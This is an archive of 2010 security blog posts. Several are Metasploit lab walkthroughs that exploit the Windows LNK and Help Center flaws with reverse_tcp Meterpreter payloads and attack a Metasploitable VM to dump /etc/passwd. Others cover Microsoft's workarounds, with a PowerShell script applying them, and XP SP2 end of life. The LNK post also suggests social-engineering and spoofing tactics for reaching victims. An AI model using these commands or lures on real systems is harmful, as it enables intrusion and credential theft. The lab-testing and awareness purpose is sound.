Category: Exploits

Jul 22 2010

Exploiting MS “LNK” Vulnerability

A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability; that entry explains what the issue is and lists a few basic mitigation techniques.

Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.

Proof of concept testing:
This test was performed using my BT4 VM, which was assigned IP address 192.168.126.135, and a Windows XP SP3 VM using IP address 192.168.126.134.

Step 1: Load Metasploit and get latest update

On my BackTrack 4 VM I browsed to /pentest/exploit/framework3 and loaded msfconsole; once that was loaded I ran svn update to get the latest and greatest.

Fig-1 SVN Update

Step 2: Select your Exploit and Payload

msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options

The show options command lists the various parameters that need to be set for the exploit to be functional. In our case that means setting the listening IP and listening port.

Fig-2  Choosing Exploit and Payload

Step 3: Fill-in required options and run exploit

At this stage you simply fill in the correct IP address and listening port of the machine you are launching the attack from. If this is not correct the victim machine will not know where to connect back to, since I selected reverse_tcp.

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set SRVHOST 192.168.126.135

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set LHOST 192.168.126.135

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > exploit

Fig-3 Fill-in LHOST and SRVHOST

Step 4: Get your victim to click the link or view the malicious file

Now at this stage you have to get a bit creative. I can suggest a few things you can try:

  • Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example.
  • Use a tool like Social Engineering Toolkit “SET” to send a spoofed email with your malicious link, example.
  • ARP spoof your host network, find a given target that's using Facebook or one of many social networks, and try to send them the link that way.
  • Try a far-out social engineering attack: purchase several USB drives, inject them, and mail them to your target with the label "free USB drive".

Once you have your targets in sight, just sit back and wait. Once an exploitation has been kicked off you will see the below:

Fig-4 Successful Exploit

Verify you have an active session using sessions -l, then connect to that session with sessions -i #; from there you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XP VM and that it was successfully exploited.

Fig-5 Running Commands on exploited host

Fig-6 Popup box on exploited host

In the end there is not much the average user, who is not aware of everyday vulnerabilities, can do; it is up to us as IT professionals to stay in the loop so that we can bring the information back and make them aware. Lastly, the image in Figure 6 should be a dead giveaway that something is up with your computer: if you didn't connect to a share but all of a sudden see one pop up, it is time for a "wipe and reinstall." Have fun until Microsoft patches this one, and remember to be responsible. All feedback is welcome.



Jul 19 2010

Microsoft Validates Shortcut Vulnerability

Last Thursday I read a posting over at http://krebsonsecurity.com referencing a potential vulnerability related to the way Windows parses shortcuts. Since Microsoft had not confirmed it at the time, it was just another interesting read. One day later Microsoft validated the claim, and now it is yet another Windows zero-day without a proper workaround.

Issue:

The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.

Workaround:

Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

Disable the displaying of icons for shortcuts

Note: Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.

1. Click Start, click Run, type Regedit in the Open box, and then click OK
2. Locate and then click the following registry key:

HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler

3. Click the File menu and select Export
4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save

Note: This will create a backup of this registry key in the My Documents folder by default.

5. Select the value (Default) in the right-hand window of the Registry Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter.
6. Restart explorer.exe or restart the computer.

Impact of workaround. Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

Disable the WebClient service

Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.

To disable the WebClient Service, follow these steps:

1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Disabled. If the service is running, click Stop.
4. Click OK and exit the management application.

Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.

How to undo the workaround.

To re-enable the WebClient Service, follow these steps:

1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Automatic. If the service is not running, click Start.
4. Click OK, and exit the management application.
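Added example (not from the Microsoft advisory or this post): a PowerShell script that audits, applies and undoes both workarounds above, the IconHandler default value and the WebClient service, from an elevated prompt on the affected host. The backup file name mirrors the LNK_Icon_Backup.reg used in the steps; its location under the user profile, and the elevated prompt, are assumptions.

```powershell
# Added example, not part of the advisory or the original post. Assumes an
# elevated PowerShell prompt; the backup path under the profile is an assumption.
param(
    [ValidateSet('Audit', 'Apply', 'Undo')]
    [string]$Mode = 'Audit',
    [string]$BackupFile = (Join-Path $env:USERPROFILE 'LNK_Icon_Backup.reg')
)

# Key named in the advisory steps; Registry:: provider path avoids needing an HKCR: drive.
$IconHandlerKey  = 'HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler'
$IconHandlerPath = "Registry::$IconHandlerKey"

function Get-LnkWorkaroundState {
    # Reports whether each workaround is currently in effect on this host.
    $handler = (Get-ItemProperty -Path $IconHandlerPath).'(default)'
    # Win32_Service exposes StartMode on every PowerShell version, unlike Get-Service.
    $svc = Get-WmiObject -Class Win32_Service -Filter "Name='WebClient'"
    $state = 'NotInstalled'; $mode = 'NotInstalled'
    if ($svc) { $state = $svc.State; $mode = $svc.StartMode }
    New-Object PSObject -Property @{
        IconHandlerValue   = $handler
        IconHandlerBlanked = [string]::IsNullOrEmpty($handler)   # true = workaround 1 applied
        WebClientState     = $state
        WebClientStartMode = $mode                                # 'Disabled' = workaround 2 applied
    }
}

function Enable-LnkWorkaround {
    # Back up the key first (steps 3-4 above), then blank its (Default) value (step 5).
    if (Test-Path $BackupFile) { Remove-Item $BackupFile -Force }
    & reg.exe export $IconHandlerKey $BackupFile | Out-Null
    Set-ItemProperty -Path $IconHandlerPath -Name '(default)' -Value ''
    # Disable the WebClient (WebDAV client) service: stop it if running, then set Disabled.
    $svc = Get-Service -Name WebClient -ErrorAction SilentlyContinue
    if ($svc) {
        if ($svc.Status -eq 'Running') { Stop-Service -Name WebClient -Force }
        Set-Service -Name WebClient -StartupType Disabled
    }
    Write-Host 'Workarounds applied. Restart explorer.exe or reboot for the icon change to take effect.'
}

function Disable-LnkWorkaround {
    # Restore the exported key and return WebClient to Automatic start, as in the undo steps.
    if (-not (Test-Path $BackupFile)) { throw "Backup $BackupFile not found; cannot restore IconHandler." }
    & reg.exe import $BackupFile | Out-Null
    $svc = Get-Service -Name WebClient -ErrorAction SilentlyContinue
    if ($svc) {
        Set-Service -Name WebClient -StartupType Automatic
        if ($svc.Status -ne 'Running') { Start-Service -Name WebClient }
    }
    Write-Host 'Workarounds reverted. Restart explorer.exe or reboot to restore shortcut icons.'
}

switch ($Mode) {
    'Apply' { Enable-LnkWorkaround }
    'Undo'  { Disable-LnkWorkaround }
}
# Every mode ends with an audit so the resulting state is visible.
Get-LnkWorkaroundState | Format-List
```

Run with -Mode Audit on a fleet of XP hosts to confirm the workaround is actually in place before relying on it; the Audit output is also what you would check again once the official patch ships and the workaround is undone.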

This brings up the same concern I spoke about in this post: now that Microsoft is no longer supporting SP2, we can add this to the list of exploits that we can always be certain will work on the SP2 platform. In the end, if the workaround is not hindering any mission-critical application, I think everyone should apply it.

References:

http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/

http://www.computerworld.com/s/article/9179299/Microsoft_confirms_nasty_Windows_zero_day_bug?taxonomyId=17

http://www.microsoft.com/technet/security/advisory/2286198.mspx

http://clubhouse.microsoft.com/Public/Post/48631f1c-c884-4d3e-a19b-c9994bcd4637


Jul 13 2010

Patch Tuesday & XP SP2 end of life

In Microsoft's own words, Patch Tuesday is defined as: "When necessary, Microsoft releases security updates on the second Tuesday of each month. We publish security bulletins to announce and describe the update. Occasionally security updates are released more often."

Now, in case you are wondering why I am choosing today of all days to talk about Patch Tuesday: today is significant because patches and support for XP SP2 officially end today. This might not seem like a big deal to a lot of people, but I know there are several companies that still run legacy software that is not supported on SP3 or above. So in short, any new vulnerabilities discovered in the coming months or years will leave all those users exposed, just waiting to be exploited!

If you think that's bad, what about a vulnerability that was reported to Microsoft years ago and never patched? Those users could already have been exploited. A reference for this is a statement HD Moore made on Twitter today: "Almost four years later, Microsoft EOL's Windows XP SP2 without fixing the flaw I reported in 2006." HDM is the Chief Architect of the Metasploit project, which was created to provide information on exploit techniques and to create a functional knowledge base for exploit developers and security professionals. Luckily he is one of the good guys, but if this exploit, and many more like it, were in the wrong hands, the sky's the limit.

So for anyone still using XP SP2, it is time to apply the patches below and also come up with a strategy for these potentially vulnerable machines.

Latest Security Updates

  • MS10-042 (Patch NOW) addresses a vulnerability in Microsoft Windows (KB 2229593) –> previous blog entry on this
  • MS10-043 – addresses a vulnerability in Microsoft Windows (KB 2032276)
  • MS10-044 – addresses vulnerabilities in Microsoft Office (KB 982335)
  • MS10-045 – addresses a vulnerability in Microsoft Office Outlook (KB 978212)

Looking forward to seeing what  others might have to say about this.

References:

http://www.microsoft.com/security/updates/bulletins/default.aspx

http://isc.sans.edu/diary.html?storyid=9166&rss

http://www.microsoft.com/security/updates/bulletins/201007.aspx

Jun 16 2010

Fun time with “Microsoft Help Center flaw”

After seeing all the buzz on twitter about the newly discovered Microsoft zero day, I decided to try and replicate it in my lab and just act as another source for bringing about some awareness on the issue at hand.

According to Microsoft Security Advisory (2219475), Microsoft is investigating new public reports of a possible vulnerability in the Windows Help and Support Center function that is delivered with supported editions of Windows XP and Windows Server 2003. This vulnerability could allow remote code execution if a user views a specially crafted Web page using a Web browser or clicks a specially crafted link in an e-mail message. Microsoft is aware that proof of concept exploit code has been published for the vulnerability. However, Microsoft is not currently aware of active attacks that use this exploit code or of customer impact at this time. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary.

In short, you are affected if you are running any of the following OS:

  • Windows XP Service Pack 2 and Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems

The advisory was prompted by the bug's disclosure early Thursday, and the release of proof-of-concept attack code. Tavis Ormandy, a security engineer who works for Google in Switzerland, defended the decision to reveal the flaw only five days after reporting it to Microsoft. But Microsoft and other researchers questioned the quick publication.

Now I am somewhat on the fence with this one. I can see how responsible disclosure would have been ideal for Microsoft in this case, as it would have given MS more time to get a fully tested patch out. On the flip side, I think knowing in advance gives us as defenders a fighting chance, since the disclosure-to-patch cycle can be a pretty lengthy process, and the "bad guys" could already have been using this for a long time.

While trying to test this I ran into some issues, and was then pointed to the following pastebin entry by the helpful guys in the http://www.skullsecurity.org/blog/ IRC channel.

POC testing with Metasploit Test #1:

I started by testing the current exploit from the Metasploit framework on my BT4 VM, attacking my Windows 7 workstation which had MSE installed. Since the release notes stated that Windows 7 is not affected, I just wanted to see what effect it would have. I loaded up my BackTrack VM, launched MSF and used the following commands.

msf > use exploit/windows/browser/ms10_xxx_helpctr_xss_cmd_exec

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set SRVHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > exploit

And as expected it failed!

Fig-1 Failed against Win7

Interestingly enough, Microsoft Security Essentials was able to detect this while my Comodo Internet Security suite did not.

Fig-2 MSE detected Exploit attempt

I was then able to browse my Temporary Internet Files folder and find the HTML page with the malicious iframe.

Fig-3 Malicious Iframe

POC testing with Metasploit Test #2:

I then went on to try this on a newly built Windows XP SP3 machine and it kept failing; after running the 74 or so Windows updates I tried again and was successful. So it is always important to run updates :) .

I started this second test by loading up my BackTrack VM and repeating the same steps as above; once that was set up I went over to my Windows XP test machine, connected to http://backtrackmachine, then sat back and watched Metasploit with the Meterpreter payload do its thing.

msf > use exploit/windows/browser/ms10_xxx_helpctr_xss_cmd_exec

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set SRVHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > exploit

Fig-4 XP Successfully Exploited

Fig-5 Game over

As you can see from Fig-5 above, the payload was deployed successfully and I was able to run a simple ipconfig command to verify that I was on the victim system with IP address 192.168.126.134. I also went back over to the XP machine and ran netstat -an to verify that it was connected to the BackTrack VM on the listening port 4444.

Fig-6 WinXP Netstat -an

Now I noticed a few things on the victim XP test machine once I connected to the malicious URL (and with all the social media outlets it is just too easy to get an average user to click on a link):

  • I saw a command prompt pop up and disappear after 1-2 seconds
  • I noticed Windows Media Player launch itself
  • Lastly, the "Help and Support Center" page was launched

Now for the average user some of these things might not always raise a red flag. However, for anyone remotely security conscious, if you ever notice a few of these random acts of weirdness it's time to get out that clean backup image and start the nuke and pave process.

References

http://www.computerworld.com/s/article/9177966/Microsoft_confirms_critical_Windows_XP_bug

http://www.microsoft.com/technet/security/advisory/2219475.mspx

http://seclists.org/fulldisclosure/2010/Jun/205

http://www.offensive-security.com/metasploit-unleashed/metasploit-unleashed-free-information-security-training

Jun 07 2010

Taking the stress out of demoing with Metasploitable

Back in late May I was preparing for a presentation and while trying to figure out if I should do a live demo or show screen-shots, I noticed a tweet from HDMoore announcing the release of “Metasploitable”.

According to the Metasploit blog, Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql. Now you might ask yourself why this is important: who wants a system that is easily hackable? The answer is simple: if you are doing exploit development/pentesting, or just want to practice your Kung Fu and need a platform to test on, then Metasploitable is the answer.

In my case I needed to do a demo, and instead of configuring a vulnerable system I simply downloaded the torrent, loaded it up into my VMware Player and I was set to go. At first I was having a hard time finding people to seed the torrent; however, after I visited the Pauldotcom IRC room and spoke with Mubix, a few minutes later I had about 20 people seeding.

You should read the entire blog posting to really get a feel for some of the things you can do with Metasploitable. Keeping with the theme from my last blog post “So easy, even A Script Kiddie can do it” I will attempt to attack this VM using simple but effective methods.

Step One “Nmap Scan”:

The first scan I ran was nmap -A, which enables OS detection, version detection, script scanning and traceroute. Once I had an idea what I was dealing with, I then ran nmap 192.168.126.128 --script=smb-brute.nse. The purpose of this script is to brute force the host's SMB logins and report any successful credentials. In this case those credentials were msfadmin/msfadmin and user/user.

Fig-1 Nmap --script=smb-brute.nse

Step two “Fast-Track Metasploit Autopwnage”:

Quoted from the Fast-Track program page: Metasploit Autopwn is a feature within Metasploit that is rich with different options. Autopwn allows you to NMAP scan a host, and automatically run exploits against the open ports on the system. So to break it down in simplistic terms, a port scan is run against multiple hosts or one target; once those ports have been identified, Metasploit will pull whatever exploits it has for those open ports, it may be 0, it may be 30. Those exploits are then launched against the system you scanned. It's really a brute force of exploits; it doesn't know what version is being run on the system, it just blindly launches a ton of exploits at the system.

After running the exploit brute force against the Metasploitable VM I was able to successfully exploit the system and got a session; however, I was not able to interact with this session. That being said, I was 50% there: I now had a working exploit I could use manually with Metasploit, choosing a payload of my liking to gain shell access.

Fig-2 Fast-Track menu, “choose option 2″

Fig-3 Fast-Track “successfully found an exploit”

Step three “Using Metasploit”:

At this stage we already have a working exploit that Fast-Track discovered above, so it's time to use that exploit with a payload of our choosing. I am using BackTrack 4 final release, since the idea is to use the simplest tools possible instead of installing and configuring anything; also, my Metasploitable IP address in this example is 192.168.126.128.

cd /pentest/exploit/framework3

msfconsole

msf > svn update

msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec

msf exploit(tikiwiki_graph_formula_exec) > set RHOST 192.168.126.128

msf exploit(tikiwiki_graph_formula_exec) > set RPORT 80

msf exploit(tikiwiki_graph_formula_exec) > set PAYLOAD cmd/unix/generic

msf exploit(tikiwiki_graph_formula_exec) > set CMD 'cat /etc/passwd'

msf exploit(tikiwiki_graph_formula_exec) > exploit

The end result will be a screen display of the password file, which you can run through your favorite password cracker and have fun with the results.

Fig-4 Cat “etc/passwd”

Lastly, you can also connect to the host via http://hostname/tikiwiki/tiki-index.php and log in with admin/admin, which in most cases is among my list of default passwords to try. So in short, these are just a few simple techniques you can try during your demo to bring some real world examples instead of just giving a slide show to your audience.

References:

http://blog.metasploit.com/2010/05/introducing-metasploitable.html

http://www.offensive-security.com/metasploit-unleashed/Fast-Track-Modes